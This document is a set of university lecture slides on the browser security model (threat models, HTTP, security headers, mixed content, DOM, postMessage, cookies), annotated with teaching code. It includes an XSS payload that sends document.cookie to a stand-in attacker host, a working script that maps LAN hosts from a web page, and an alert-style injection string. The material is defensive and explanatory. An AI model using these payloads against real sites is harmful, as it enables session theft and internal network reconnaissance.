CSCI-UA.9480 Introduction to Computer Security, Session 4.1: Browser Security Model (PowerPoint presentation)



  1. CSCI-UA.9480 Introduction to Computer Security. Session 4.1: Browser Security Model. Prof. Nadim Kobeissi.

  2. 4.1a Defining Browser Security Goals. Also, before we start: Practical Assignment 2 is now online. CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  3. Browser security goals.
  ● Confidentiality: information on your device is not put at risk simply by browsing the web.
  ● Integrity: different websites are managed through different sessions, in isolation from one another.
  More far-reaching goals could include giving web applications the same security guarantees as desktop applications.

  4. Can web apps be as trustworthy as local apps? Example: ProtonMail.
  ● ProtonMail ensures its security guarantees through TLS and client-side encryption.
  ● However, a malicious ProtonMail host server can imperceptibly modify the code it serves to selected sessions: the browser fetches the application code afresh on every visit, so the server is trusted every single time.
  This is very different from desktop and mobile applications, which have code signing and versioning.

  5. Browser security threat model. [Diagram: Alice's browser connects through the Internet to the server google.com.]

  6. Browser security threats: web attacker. [Diagram: Alice's browser is led, through the Internet, to the attacker's server at the lookalike domain gooogle.com rather than google.com.]

  7. Browser security threats: web attacker. [Diagram: Alice receives the lure "Log into apple-icloud.com to reset your password!", which sends her browser through the Internet to the attacker's server.]

  8. Browser security threats: network attacker. [Diagram: the attacker sits on the Internet path between Alice's browser and the server google.com.]

  9. Browser security threats: software attacker. [Diagram: Alice's browser, the Internet and the server google.com; the attacker asks "XSS? RCE?", i.e. looks for exploitable bugs in the server or the browser software.]

  10. Browser security threats: software attacker. [Diagram: Alice receives the lure "Open this attachment which contains your latest bill!"; the attachment carries exploit code.]

  11. Comparing different attackers.
  Web attacker.
  ● Controls their own website, for which they can get SSL/TLS certificates, etc.
  ● The user is misled into visiting the attacker's website. Fundamentally an authentication issue.
  Network attacker.
  ● Passive eavesdropping or active traffic modification. Offset by TLS.
  Software attacker.
  ● Actually finds bugs, tries to run code via XSS, maybe pop a shell…

  12. Comparing different attackers.
  Software attacker.
  ● Actually finds bugs, tries to run code via XSS, maybe pop a shell…
  ● Cross-site scripting (XSS): inject code into a page that is later executed by a separate client the attacker does not control. (Can you come up with XSS scenarios?)
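  One concrete XSS scenario, as an added example that is not part of the lecture slides: a comment box whose contents are concatenated straight into the page. The comment template, the author name "mallory" and the attacker host attacker.example are constructed for illustration.

```javascript
// Added example, not code from the lecture: how untrusted input becomes XSS
// when concatenated into HTML, and the escaping that prevents it.
// The comment template and the payload are constructed for illustration.

// Vulnerable: the server (or a client-side template) concatenates raw input.
function renderCommentUnsafe(author, comment) {
  return `<div class="comment"><b>${author}</b>: ${comment}</div>`;
}

// Hardened: escape the characters that let text break out of an HTML text
// node or a quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderCommentSafe(author, comment) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(comment)}</div>`;
}

// Check over rendered output: list every tag that the template did not emit.
// Anything listed here came from user input and will execute in *every*
// visitor's browser, under the vulnerable site's origin (the "separate
// client" on the slide).
function foreignTags(html, allowedTags) {
  const tags = html.match(/<\/?[a-z][a-z0-9]*[^>]*>/gi) || [];
  return tags.filter((t) => !allowedTags.includes(t.match(/^<\/?([a-z0-9]+)/i)[1].toLowerCase()));
}

// Constructed payload: the image never loads, so its error handler runs and
// ships the victim's cookies to the attacker.
const payload =
  "<img src=x onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">";

function demo() {
  const unsafe = renderCommentUnsafe("mallory", payload);
  const safe = renderCommentSafe("mallory", payload);
  return {
    unsafeForeign: foreignTags(unsafe, ["div", "b"]), // one <img ...> tag
    safeForeign: foreignTags(safe, ["div", "b"]),     // none
    safe,
  };
}
```

  The point of `foreignTags` is that the attacker's code does not run on the attacker's machine: it runs in the browser of whoever views the comment, with that site's cookies and DOM in reach. Escaping is context dependent; the escaper above is correct for HTML text nodes and quoted attribute values, not for data placed inside `<script>` blocks, URLs or CSS.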

  13. Browser security goals (recap).
  ● Confidentiality: information on your device is not put at risk simply by browsing the web.
  ● Integrity: different websites are managed through different sessions, in isolation from one another.

  14. 4.1b Browser Security Mechanisms.

  15. Browser security mechanisms to cover.
  ● HTTP.
  ● Rendering content.
  ● Isolation.
  ● Communication.
  ● Security user interface.
  ● Cookies.
  Many more mechanisms exist. It's impossible to cover them all.

  16. URIs. https://facebook.com/login.php?target=newsFeed#latest

  17. URIs.
  https://facebook.com/login.php?target=newsFeed#latest
  ● Protocol: https
  ● Hostname (can include a port): facebook.com
  ● Path: /login.php
  ● Query: ?target=newsFeed
  ● Fragment: #latest. Not sent to the server (unless JavaScript explicitly sends it).
  The path and query are encrypted if using HTTPS. The hostname is not hidden by HTTPS: it is visible in the DNS lookup and in the TLS handshake (SNI).

  18. HTTP.
  GET /index.html HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
  Host: www.nyu.edu
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive

  POST /login HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
  Host: www.nyu.edu
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 31
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive

  username=bob&password=logmein23
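  To connect slides 17 and 18, here is an added example (not from the lecture) that splits a URL into the components named on slide 17 and builds the request line and Host header a browser would send for it. It also checks two lookalike URLs of the kind the web-attacker slides describe; the hosts evil.example and facebook.com.evil.example are constructed.

```javascript
// Added example, not from the slides: URL components and what reaches the server.
// Uses the WHATWG URL parser that browsers and Node share.
function decompose(urlString) {
  const u = new URL(urlString);
  return {
    protocol: u.protocol.replace(/:$/, ""),
    hostname: u.hostname,
    port: u.port,          // "" when the scheme default is used
    host: u.host,          // hostname[:port], exactly what goes in the Host header
    path: u.pathname,
    query: u.search,       // includes the leading "?"
    fragment: u.hash,      // includes the leading "#"; never sent to the server
    userinfo: u.username,  // text before "@"; rarely legitimate, classic lure material
  };
}

// The request a browser sends for this URL: no fragment, and the Host header
// carries the real host, not whatever appears before an "@" or in the path.
function requestFor(urlString) {
  const u = new URL(urlString);
  return `GET ${u.pathname}${u.search} HTTP/1.1\r\nHost: ${u.host}\r\n\r\n`;
}

// The check to run on a link before trusting it: will the browser actually
// talk to the host the link text suggests?
function resolvesToExpectedHost(urlString, expectedHost) {
  return new URL(urlString).hostname === expectedHost;
}

// Constructed inputs: the slide's URL plus two lookalikes.
const legit = "https://facebook.com/login.php?target=newsFeed#latest";
const lureUserinfo = "https://facebook.com@evil.example/login.php";   // "facebook.com" is userinfo
const lureSubdomain = "https://facebook.com.evil.example/login.php"; // evil.example owns this
```

  `new URL(...)` is the same parser the browser uses for navigation, so whatever `hostname` it returns is the host that will be contacted and that must hold the TLS certificate; everything that merely looks like a hostname elsewhere in the string is decoration.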

  19. HTTP.
  HTTP/1.1 200 OK
  Date: Mon, 27 Jul 2018 12:28:53 GMT
  Server: Apache/2.2.14 (Win32)
  Last-Modified: Wed, 22 Jul 2018 19:15:56 GMT
  Content-Length: 88
  Content-Type: text/html
  Connection: Closed

  <html>
  <body>
  <h1>Hello, World!</h1>
  </body>
  </html>

  20. Examples of HTTP headers related to security.
  ● HTTP Strict Transport Security (HSTS): instructs the browser to use only HTTPS when connecting to this host for the specified period of time. Browsers honor the header only when it arrives over HTTPS.
  Strict-Transport-Security: max-age=<expirationtime>; includeSubDomains
  ● Content Security Policy (CSP): disable dangerous JavaScript and CSS features, prevent loading content from unspecified resource addresses.
  Content-Security-Policy: <directive>
  ● X-Frame-Options: prevent this page from being loaded in an iframe on other websites (today also expressible as the CSP frame-ancestors directive).
  X-Frame-Options: DENY
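  As an added example (not from the slides), a small audit that parses the three headers above and reports weak or missing settings over a constructed response. The one-year minimum for max-age and the other thresholds are my assumptions, not requirements stated in the lecture.

```javascript
// Added example, not from the slides: audit HSTS, CSP and X-Frame-Options.
const MIN_HSTS_AGE = 31536000; // one year; assumption, not a lecture value

// Parse "k=v; flag; k2=v2" into { k: v, flag: true } with lower-cased keys.
function parseDirectives(value) {
  const out = {};
  for (const part of value.split(";")) {
    const [k, v] = part.trim().split("=");
    if (k) out[k.toLowerCase()] = v === undefined ? true : v.trim();
  }
  return out;
}

// Parse a CSP into { directive: [source, ...] }.
function parseCsp(value) {
  const policy = {};
  for (const d of value.split(";")) {
    const tokens = d.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// headers: object keyed by lower-cased header name. Returns a list of findings.
function auditSecurityHeaders(headers, servedOverHttps = true) {
  const findings = [];

  const hsts = headers["strict-transport-security"];
  if (!hsts) findings.push("HSTS missing");
  else {
    if (!servedOverHttps) findings.push("HSTS is ignored by browsers unless received over HTTPS");
    const d = parseDirectives(hsts);
    if (Number(d["max-age"] || 0) < MIN_HSTS_AGE) findings.push("HSTS max-age below one year");
    if (!("includesubdomains" in d)) findings.push("HSTS lacks includeSubDomains");
  }

  const csp = headers["content-security-policy"];
  const policy = csp ? parseCsp(csp) : {};
  if (!csp) findings.push("CSP missing");
  else {
    // script-src falls back to default-src when absent.
    const scriptSrc = policy["script-src"] || policy["default-src"] || [];
    if (scriptSrc.includes("'unsafe-inline'")) findings.push("CSP allows inline scripts");
    if (scriptSrc.includes("*")) findings.push("CSP allows scripts from any origin");
  }

  const xfo = headers["x-frame-options"];
  if (!policy["frame-ancestors"] && !xfo) findings.push("no framing protection (frame-ancestors or X-Frame-Options)");
  if (xfo && !["DENY", "SAMEORIGIN"].includes(xfo.trim().toUpperCase())) findings.push("X-Frame-Options has an unrecognised value");

  return findings;
}

// Constructed responses: a weak configuration beside a hardened one.
const weakResponse = {
  "strict-transport-security": "max-age=300",
  "content-security-policy": "default-src 'self' 'unsafe-inline' *",
};
const hardenedResponse = {
  "strict-transport-security": "max-age=31536000; includeSubDomains",
  "content-security-policy": "default-src 'self'; script-src 'self' https://resources.nyu.edu; frame-ancestors 'none'",
  "x-frame-options": "DENY",
};
```

  The fallback from `script-src` to `default-src` matters in practice: a policy of `default-src 'self' 'unsafe-inline'` with no `script-src` still permits inline scripts, which removes most of CSP's protection against XSS.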

  21. HTTPS and mixed content.
  ● Even if an entire website is loaded using HTTPS, a single resource being served over HTTP can give the attacker leverage. Especially if it's executed.
  <html>
  <head>
  <title>NYU</title>
  <script type="application/javascript" src="https://resources.nyu.edu/login.js"></script>
  <script type="application/javascript" src="http://jquerycdn.com/jquery.js"></script>
  </head>
  <body>
  </body>
  </html>
  In this page a network attacker cannot touch login.js, but can replace jquery.js, which then runs with full access to the HTTPS page. Modern browsers block such "active" mixed content (scripts, frames, stylesheets) by default; images and media served over HTTP are treated more leniently, but still let an attacker observe or alter what the user sees.
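  The check a practitioner would run over such a page, as an added example that is not from the slides: scan the HTML for subresources fetched over plain HTTP and separate active content (which executes or restyles the page) from passive content. The HTML is the slide's page with one constructed http:// image added; the active/passive tag classification is my own and is deliberately coarse.

```javascript
// Added example, not from the slides: find mixed content in an HTTPS page.
// Classification assumption: these tags fetch content that can run or
// restyle the page (active) or only be displayed (passive).
const ACTIVE_TAGS = new Set(["script", "iframe", "link", "object", "embed"]);
const PASSIVE_TAGS = new Set(["img", "audio", "video", "source"]);

// Returns [{ tag, url, kind }] for every src/href/data attribute that points
// at an http:// URL on a tag that loads a subresource.
function findMixedContent(html) {
  const findings = [];
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const urlMatch = m[2].match(/\b(?:src|href|data)\s*=\s*["']?(http:\/\/[^\s"'>]+)/i);
    if (!urlMatch) continue;
    if (ACTIVE_TAGS.has(tag)) findings.push({ tag, url: urlMatch[1], kind: "active" });
    else if (PASSIVE_TAGS.has(tag)) findings.push({ tag, url: urlMatch[1], kind: "passive" });
  }
  return findings;
}

// The slide's page, plus a constructed http:// image to show the passive case.
const nyuPage = `<html>
<head>
<title>NYU</title>
<script type="application/javascript" src="https://resources.nyu.edu/login.js"></script>
<script type="application/javascript" src="http://jquerycdn.com/jquery.js"></script>
</head>
<body>
<img src="http://img.example/logo.png">
<a href="http://example.org/">a plain link is navigation, not a subresource</a>
</body>
</html>`;
```

  A regex scan like this is what a quick audit script does; a browser decides the same question on the actual fetch, after following redirects, so an https:// URL that redirects to http:// is also mixed content and would be missed here.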

  22. Rendering content.
  ● Browsers will load content (HTML, XML, CSS) and subsequently render it into the Document Object Model (DOM).
  ● Elements within the DOM can contain content, can have properties and can even trigger events handled by JavaScript code.
  ● JavaScript is, of course, not rendered but executed.
  [Diagram: DOM (Document Object Model) tree]
  document
  └ Root element: <html>
     ├ Element: <head>
     │  └ Element: <title>
     │     └ Text: "My title"
     └ Element: <body>
        ├ Element: <h1>
        │  └ Text: "A heading"
        └ Element: <a>
           ├ Attribute: href
           └ Text: "Link text"

  23. Rendering content.
  ● Elements in the DOM have methods (as in OO programming): document.write(), etc.
  ● In many ways, the DOM is adjacent to the Browser Object Model (BOM): window, document, history, navigator…
  [Same DOM tree diagram as slide 22.]

  24. Using JavaScript to learn local information.
  ● Example: request images from internal IP addresses:
  <img src="http://192.168.0.4:8080/"/>
  ● Use a timeout / onerror to determine success or failure.
  ● Create a map / fingerprint of local systems.
  [Same DOM tree diagram as slide 22.]
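  The probe described on this slide, as an added example that is not from the lecture. The network layer is injected so the same logic runs against a real <img> in a browser and against a constructed fake LAN here; the addresses, the favicon path and the timing assumptions are made up. Note that browsers have been tightening access from public pages to private addresses (Private Network Access), so this channel is narrower than when the slide was written.

```javascript
// Added example, not from the slides: fingerprint LAN hosts via <img> timing.

// Browser loader: an <img> fires onload for a real image, onerror for any
// other answer (HTML, connection refused), and nothing until TCP gives up
// when no host is there. Node has no Image; this function is browser-only.
function browserLoader(url, onResult) {
  const img = new Image();
  img.onload = () => onResult("load");
  img.onerror = () => onResult("error");
  img.src = url;
}

// Probe one host:port. Any answer before the timeout means something is
// listening; only silence suggests an unused address.
function probe(host, loader, timeoutMs, report) {
  let done = false;
  const timer = setTimeout(() => {
    if (!done) { done = true; report(host, "no-response"); }
  }, timeoutMs);
  loader(`http://${host}/favicon.ico`, (outcome) => {
    if (done) return;
    done = true;
    clearTimeout(timer);
    report(host, outcome === "load" ? "alive (served an image)" : "alive (answered, not an image)");
  });
}

// Probe many hosts; results fill in as answers arrive, onComplete fires last.
function fingerprint(hosts, loader, timeoutMs, onComplete) {
  const results = {};
  let pending = hosts.length;
  for (const h of hosts) {
    probe(h, loader, timeoutMs, (host, verdict) => {
      results[host] = verdict;
      if (--pending === 0) onComplete(results);
    });
  }
  return results;
}

// Constructed LAN: a web UI on :8080 that returns HTML, a host serving a real
// favicon, and an unused address that never answers.
const fakeLan = { "192.168.0.4:8080": "error", "192.168.0.1": "load" };
function fakeLoader(url, onResult) {
  const host = new URL(url).host;
  if (host in fakeLan) onResult(fakeLan[host]); // answers immediately
  // unused addresses never call back; the timeout classifies them
}

// In a browser you would call: fingerprint(hosts, browserLoader, 3000, console.log)
```

  The information leak is the timing and success/failure of a cross-origin fetch, not the response body: the page never reads the image, yet it learns which addresses answered and how fast.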

  25. Isolation and communication.
  ● Iframes: split a page into separate, isolated segments, each with their own namespace. The isolation is enforced only between different origins; a same-origin frame can reach into its parent's DOM, and the sandbox attribute can restrict a frame further.
  ● Windows and their frames may interact through a restricted API: window.postMessage.
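  Both ends of a postMessage exchange, as an added example that is not from the slides: the receiver must check event.origin before trusting anything, and the sender should name the intended recipient origin rather than "*". The origin https://app.example and the message shape are assumptions; the event objects are constructed to look like what a browser delivers.

```javascript
// Added example, not from the slides: a checked window.postMessage handler.
const TRUSTED_ORIGIN = "https://app.example"; // assumption

// Insecure receiver: trusts any sender and any content. Any page that can
// frame or open this window can inject data into this origin.
function onMessageUnsafe(event, sink) {
  sink(event.data);
}

// Hardened receiver: verify the sender's origin, then validate the shape of
// the data before acting on it. Returns true when the message was accepted.
function onMessageSafe(event, sink) {
  if (event.origin !== TRUSTED_ORIGIN) return false;
  const msg = event.data;
  if (typeof msg !== "object" || msg === null) return false;
  if (msg.type !== "setTheme" || !["light", "dark"].includes(msg.theme)) return false;
  sink(msg);
  return true;
}

// Sender: pass the recipient's origin instead of "*", so the browser drops
// the message if the frame has since navigated to another site.
function sendToFrame(frameWindow, msg) {
  frameWindow.postMessage(msg, TRUSTED_ORIGIN);
}

// Constructed events, shaped like MessageEvent.
const fromTrusted = { origin: "https://app.example", data: { type: "setTheme", theme: "dark" } };
const fromAttacker = { origin: "https://evil.example", data: { type: "setTheme", theme: "dark" } };
const malformed = { origin: "https://app.example", data: "<img src=x onerror=alert(1)>" };

// In a browser: window.addEventListener("message", (e) => onMessageSafe(e, applyTheme));
```

  Checking the origin answers "who sent this"; validating the payload answers "is this something I am willing to do". Handlers that skip the second step and write event.data into the DOM turn a trusted sender's bug into XSS in their own origin.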

  26. Security user interface.
  ● Users need to check for many markers:
  ● Is the site using TLS?
  ● Is the URL accurate?
  ● Extended validation sometimes helps (though major browsers have since stopped displaying EV details prominently).
  ● Users can still be misled by a padlock.jpg.

  27. Cookies. Cookies act as session identifiers or key-value stores between the web client and web server.
  ● Once the client logs in (e.g. via a POST), the server may issue them a secret session cookie that they both then keep track of:
  Set-Cookie: NAME=VALUE; domain=...; expires=...; secure; httpOnly
  ● Secure cookies are sent only over HTTPS.
  ● httpOnly cookies can be sent over HTTP or HTTPS (misleading name) but cannot be accessed by JavaScript via document.cookie.
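  A minimal model of how a browser applies the Secure and httpOnly attributes, as an added example that is not from the slides: parse Set-Cookie lines, decide which cookies go on a request, and show what document.cookie exposes. The Set-Cookie lines and URLs are constructed; Path and SameSite matching are not modelled.

```javascript
// Added example, not from the slides: a toy cookie jar for Secure / HttpOnly.

// Parse one Set-Cookie header value into a cookie record.
function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), secure: false, httpOnly: false, domain: null, expires: null };
  for (const a of attrs) {
    const [k, v] = a.split("=");
    switch (k.toLowerCase()) {
      case "secure": cookie.secure = true; break;
      case "httponly": cookie.httpOnly = true; break;
      case "domain": cookie.domain = v.replace(/^\./, "").toLowerCase(); break;
      case "expires": cookie.expires = new Date(v); break;
    }
  }
  return cookie;
}

// Cookies the browser attaches to a request for `url`. A cookie without a
// Domain attribute belongs to the host that set it (setByHost); with one, it
// is sent to that domain and its subdomains. Secure cookies need HTTPS.
function cookieHeaderFor(jar, url, setByHost) {
  const u = new URL(url);
  const https = u.protocol === "https:";
  return jar
    .filter((c) => {
      const d = c.domain || setByHost;
      const domainOk = u.hostname === d || u.hostname.endsWith("." + d);
      return domainOk && (https || !c.secure);
    })
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// What document.cookie shows to page scripts: HttpOnly cookies are hidden,
// so an XSS payload cannot read them (it can still make requests that carry them).
function documentCookie(jar) {
  return jar.filter((c) => !c.httpOnly).map((c) => `${c.name}=${c.value}`).join("; ");
}

// Constructed Set-Cookie responses received from https://www.nyu.edu.
const jar = [
  "session=8f3a9c; Secure; HttpOnly",
  "theme=dark",
  "tracker=abc; Domain=.nyu.edu",
].map(parseSetCookie);
```

  The two attributes defend against different attackers: Secure keeps the session cookie away from the network attacker who can see or inject plain-HTTP requests, httpOnly keeps it away from the software attacker who has achieved XSS. Neither stops the XSS payload from issuing authenticated requests from inside the victim's browser.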

  28. 4.2 Next time: Web Application Security. Review this learning tool for next time! https://unescape-room.jobertabma.nl
